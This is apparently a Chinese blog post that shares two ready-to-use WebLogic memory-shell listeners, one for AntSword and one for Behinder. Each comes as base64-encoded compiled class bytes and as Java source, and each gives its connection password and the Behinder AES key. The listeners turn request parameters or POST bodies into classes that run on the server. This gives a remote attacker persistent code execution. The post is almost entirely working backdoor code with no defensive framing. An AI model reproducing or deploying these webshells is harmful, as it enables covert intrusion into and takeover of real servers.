蚁剑 YiListener jdk1.7编译 密码 ant
yv66vgAAADIAhQoAHgBNCgAeAE4KAB4ATwgAUAoACQBRCgAJAFIKAAwAUwgAVAcAVQcAVgoACQBXBwBYCgBZAFoHAC0HAFsIAFwIAF0IAF4KAF8AYAcAYQoAFABiCABjCgAUAGQHAGUKAAkAZgoAGABOCgAYAGcKABgAaAoADABpBwBqBwBrAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABxMY29tL3Rlc3QvR29vZFlpL1lpTGlzdGVuZXI7AQAaKExqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBAAFjAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAFnAQAVKFtCKUxqYXZhL2xhbmcvQ2xhc3M7AQABYgEAAltCAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAZiYXNlNjQBABFMamF2YS9sYW5nL0NsYXNzOwEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAANzdHIBABJMamF2YS9sYW5nL1N0cmluZzsBAAV2YWx1ZQEADVN0YWNrTWFwVGFibGUHAGUHAFYHAFsBAApFeGNlcHRpb25zAQAQcmVxdWVzdERlc3Ryb3llZAEAJihMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdEV2ZW50OylWAQATc2VydmxldFJlcXVlc3RFdmVudAEAI0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0RXZlbnQ7AQAScmVxdWVzdEluaXRpYWxpemVkAQAHcmVxdWVzdAEALkx3ZWJsb2dpYy9zZXJ2bGV0L2ludGVybmFsL1NlcnZsZXRSZXF1ZXN0SW1wbDsBAAhyZXNwb25zZQEAL0x3ZWJsb2dpYy9zZXJ2bGV0L2ludGVybmFsL1NlcnZsZXRSZXNwb25zZUltcGw7AQADY2xzBwBsBwBhBwBtAQAKU291cmNlRmlsZQEAD1lpTGlzdGVuZXIuamF2YQwAIAAhDAAgACcMAG4AbwEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIMAHAAcQwAcgBzDAB0AHUBAAxkZWNvZGVCdWZmZXIBAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvU3RyaW5nDAB2AHcBABBqYXZhL2xhbmcvT2JqZWN0BwB4DAB5AHoBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAQamF2YS51dGlsLkJhc2U2NAEACmdldERlY29kZXIBAAZkZWNvZGUHAGwMAHsAfAEALHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvU2VydmxldFJlcXVlc3RJbXBsDAB9AH4BAANhbnQMAH8AgAEAGmNvbS90ZXN0L0dvb2RZaS9ZaUxpc3RlbmVyDACBAIIMAC4ALwwAKgArDACDAIQBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBACRqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0TGlzdGVuZXIBACFqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0RXZlbnQBAC13ZWJsb2dpYy9zZXJ2bGV0L2ludGVybmFsL1NlcnZsZXRSZXNwb25zZUltcGwBAAtkZWZpbmVDbGFzcwEAFyhbQklJKUxqYXZhL2xhbmcvQ2xhc3M7AQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAEWdldFNlcnZsZXRSZXF1ZXN0AQAgKClMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAAtnZXRSZXNwb25zZQEAMSgpTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvU2VydmxldFJlc3BvbnNlSW1wbDsBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgAhABgAHgABAB8AAAAGAAEAIAAhAAEAIgAAAC8AAQABAAAABSq3AAGxAAAAAgAjAAAABgABAAAACgAkAAAADAABAAAABQAlACYAAAABACAAJwABACIAAAA+AAIAAgAAAAYqK7cAArEAAAACACMAAAAKAAIAAAANAAUADgAkAAAAFgACAAAABgAlACYAAAAAAAYAKAApAAEAAQAqACsAAQAiAAAAPQAEAAIAAAAJKisDK763AAOwAAAAAgAjAAAABgABAAAAEAAkAAAAFgACAAAACQAlACYAAAAAAAkALAAtAAEAAQAuAC8AAgAiAAABXAAGAAYAAAB+AU4SBLgABU0stgAGOgQZBLYABxIIBL0ACVkDEwAKU7YACxkEBL0ADFkDK1O2AA3AAA7AAA5OpwBGOgQSELgABU0sEhEBtgALLAG2AA06BRkFtgAHEhIEvQAJWQMTAApTtgALGQUEvQAMWQMrU7YADcAADsAADk6nAAU6BS2wAAIAAgA2ADkADwA7AHcAegAPAAMAIwAAAC4ACwAAABUAAgAXAAgAGAAOABkANgAgADkAGgA7ABwAQQAdAE8AHgB3AB8AfAAhACQAAABSAAgADgAoADAAMQAEAAgAMQAyADMAAgBPACgAMAAxAAUAQQA5ADIAMwACADsAQQA0ADUABAAAAH4AJQAmAAAAAAB+ADYANwABAAIAfAA4AC0AAwA5AAAAMAAD/wA5AAQHADoHADsABwAOAAEHADz/AEAABQcAOgcAOwAHAA4HADwAAQcAPPoAAQA9AAAABAABAA8AAQA+AD8AAQAiAAAANQAAAAIAAAABsQAAAAIAIwAAAAYAAQAAACcAJAAAABYAAgAAAAEAJQAmAAAAAAABAEAAQQABAAEAQgA/AAEAIgAAAOQABQAGAAAAUCu2ABPAABRNK7YAE8AAFLYAFU4sEha2ABc6BBkExgAyuwAYWSq2AAe2ABm3ABoqGQS2ABu2ABy2AAYFvQAMWQMsU1kELVO2AB1XpwAFOgWxAAEAIABKAE0ADwADACMAAAAeAAcAAAArAAgALAATAC0AGwAuACAAMABKADEATwAzACQAAAA0AAUAAABQACUAJgAAAAAAUABAAEEAAQAIAEgAQwBEAAIAEwA9AEUARgADABsANQBHADcABAA5AAAAHAAC/wBNAAUHADoHAEgHAEkHAEoHADsAAQcAPAEAAQBLAAAAAgBM
package com.test.GoodYi;import weblogic.servlet.internal.ServletRequestImpl;import weblogic.servlet.internal.ServletResponseImpl;import javax.servlet.ServletRequestEvent;import javax.servlet.ServletRequestListener;public class YiListener extends ClassLoader implements ServletRequestListener {public YiListener(){}public YiListener(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}public byte[] base64Decode(String str) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("sun.misc.BASE64Decoder");Object decoder = base64.newInstance();value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });} catch (Exception e) {try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });} catch (Exception ee) {}}return value;}@Overridepublic void requestDestroyed(ServletRequestEvent servletRequestEvent) {}@Overridepublic void requestInitialized(ServletRequestEvent servletRequestEvent) {ServletRequestImpl request = (ServletRequestImpl) servletRequestEvent.getServletRequest();ServletResponseImpl response= ((ServletRequestImpl) servletRequestEvent.getServletRequest()).getResponse();String cls = request.getParameter("ant");if (cls != null) {try {new YiListener(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});} catch (Exception e) { }}}}
冰蝎 BinListener jdk1.7编译 密码 rebeyond
yv66vgAAADIAqwoAKQBUCgApAFUKACkAVgoAVwBYBwBZCgAFAFoKAAUAWwoABQBcCABdCgBeAF8IAGAIAGELAGIAYwgAZAoAZQBmBwBnCgBeAGgKABAAaQoAZQBqBwBrCgAUAFQIAEkKABQAbAgARQgARwcAbQoAbgBvCgBwAHEKABoAVQcAcgoAHgBUCgAFAHMKAHQAdQoAHgB2CgBlAHcKABoAeAoAcAB5CgBuAF8HAHoKACcAewcAfAcAfQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAdTGNvbS90ZXN0L2JpbmJpbi9CaW5MaXN0ZW5lcjsBABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEAAWMBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAAWcBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAAFiAQACW0IBABByZXF1ZXN0RGVzdHJveWVkAQAmKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0RXZlbnQ7KVYBABNzZXJ2bGV0UmVxdWVzdEV2ZW50AQAjTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3RFdmVudDsBABJyZXF1ZXN0SW5pdGlhbGl6ZWQBAAFrAQASTGphdmEvbGFuZy9TdHJpbmc7AQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQAIY29udGVueHQBABNMamF2YS91dGlsL0hhc2hNYXA7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAB3JlcXVlc3QBAC5Md2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0UmVxdWVzdEltcGw7AQAIcmVzcG9uc2UBAC9Md2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0UmVzcG9uc2VJbXBsOwEAB3Nlc3Npb24BACBMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uOwEADVN0YWNrTWFwVGFibGUHAG0HAH4HAFkHAH8HAIAHAHoBAApTb3VyY2VGaWxlAQAQQmluTGlzdGVuZXIuamF2YQwAKwAsDAArADIMAIEAggcAfgwAgwCEAQAsd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0UmVxdWVzdEltcGwMAIUAhgwAhwCIDACJAIoBAARQT1NUBwCLDACMAI0BABBlNDVlMzI5ZmViNWQ5MjViAQABdQcAgAwAjgCPAQADQUVTBwCQDACRAJIBAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjDACTAJQMACsAlQwAlgCXAQARamF2YS91dGlsL0hhc2hNYXAMAJgAmQEAG2NvbS90ZXN0L2JpbmJpbi9CaW5MaXN0ZW5lcgcAmgwAmwCcBwCdDACeAJ8BABZzdW4vbWlzYy9CQVNFNjREZWNvZGVyDACgAKEHAKIMAKMAigwApAClDACmAKcMADUANgwAqACpAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAqgAsAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAkamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdExpc3RlbmVyAQAhamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdEV2ZW50AQAtd2VibG9naWMvc2VydmxldC9pbnRlcm5hbC9TZXJ2bGV0UmVzcG9uc2VJbXBsAQAeamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uAQALZGVmaW5lQ2xhc3MBABcoW0JJSSlMamF2YS9sYW5nL0NsYXNzOwEAEWdldFNlcnZsZXRSZXF1ZXN0AQAgKClMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAAtnZXRSZXNwb25zZQEAMSgpTHdlYmxvZ2ljL3NlcnZsZXQvaW50ZXJuYWwvU2VydmxldFJlc3BvbnNlSW1wbDsBAApnZXRTZXNzaW9uAQAiKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uOwEACWdldE1ldGhvZAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAQamF2YS9sYW5nL1N0cmluZwEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEACHB1dFZhbHVlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvT2JqZWN0OylWAQATamF2YXgvY3J5cHRvL0NpcGhlcgEAC2dldEluc3RhbmNlAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAhnZXRCeXRlcwEABCgpW0IBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEABGluaXQBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAQamF2YS9sYW5nL09iamVjdAEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAD2phdmEvbGFuZy9DbGFzcwEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEACWdldFJlYWRlcgEAGigpTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7AQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEACHJlYWRMaW5lAQAMZGVjb2RlQnVmZmVyAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RvRmluYWwBAAYoW0IpW0IBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAPcHJpbnRTdGFja1RyYWNlACEAGgApAAEAKgAAAAUAAQArACwAAQAtAAAALwABAAEAAAAFKrcAAbEAAAACAC4AAAAGAAEAAAAOAC8AAAAMAAEAAAAFADAAMQAAAAEAKwAyAAEALQAAADoAAgACAAAABiortwACsQAAAAIALgAAAAYAAQAAABAALwAAABYAAgAAAAYAMAAxAAAAAAAGADMANAABAAEANQA2AAEALQAAAD0ABAACAAAACSorAyu+twADsAAAAAIALgAAAAYAAQAAABMALwAAABYAAgAAAAkAMAAxAAAAAAAJADcAOAABAAEAOQA6AAEALQAAADUAAAACAAAAAbEAAAACAC4AAAAGAAEAAAAZAC8AAAAWAAIAAAABADAAMQAAAAAAAQA7ADwAAQABAD0AOgABAC0AAAGNAAYACAAAALErtgAEwAAFTSu2AATAAAW2AAZOLLYABzoELLYACBIJtgAKmQCOEgs6BRkEEgwZBbkADQMAEg64AA86BhkGBbsAEFkZBbYAERIOtwAStgATuwAUWbcAFToHGQcSFiy2AAe2ABdXGQcSGCy2ABdXGQcSGS22ABdXuwAaWSq2ABu2ABy3AB0ZBrsAHlm3AB8stgAgtgAhtgAitgAjtgAktgAlGQe2ACZXpwAKOgUZBbYAKLEAAQAlAKYAqQAnAAMALgAAAD4ADwAAAB0ACAAeABMAHwAZACAAJQAiACkAIwA0ACQAOwAlAE8AJgBYACcAZAAoAG0AKQB2ACoApgArALAALQAvAAAAXAAJACkAfQA+AD8ABQA7AGsAMwBAAAYAWABOAEEAQgAHAKsABQBDAEQABQAAALEAMAAxAAAAAACxADsAPAABAAgAqQBFAEYAAgATAJ4ARwBIAAMAGQCYAEkASgAEAEsAAAAcAAL/AKkABQcATAcATQcATgcATwcAUAABBwBRBgABAFIAAAACAFM=
package com.test.binbin;import weblogic.servlet.internal.ServletRequestImpl;import weblogic.servlet.internal.ServletResponseImpl;import java.util.*;import javax.crypto.*;import javax.crypto.spec.*;import javax.servlet.ServletRequestEvent;import javax.servlet.ServletRequestListener;import javax.servlet.http.HttpSession;public class BinListener extends ClassLoader implements ServletRequestListener {public BinListener(){}public BinListener(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}@Overridepublic void requestDestroyed(ServletRequestEvent servletRequestEvent) {}@Overridepublic void requestInitialized(ServletRequestEvent servletRequestEvent) {ServletRequestImpl request = (ServletRequestImpl) servletRequestEvent.getServletRequest();ServletResponseImpl response= ((ServletRequestImpl) servletRequestEvent.getServletRequest()).getResponse();HttpSession session = request.getSession();if (request.getMethod().equals("POST")){try{String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));HashMap contenxt = new HashMap();contenxt.put("session", request.getSession());contenxt.put("request", request);contenxt.put("response", response);new BinListener(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(contenxt);}catch (Exception e){e.printStackTrace();}}}}
若有收获,就点个赞吧
0 人点赞
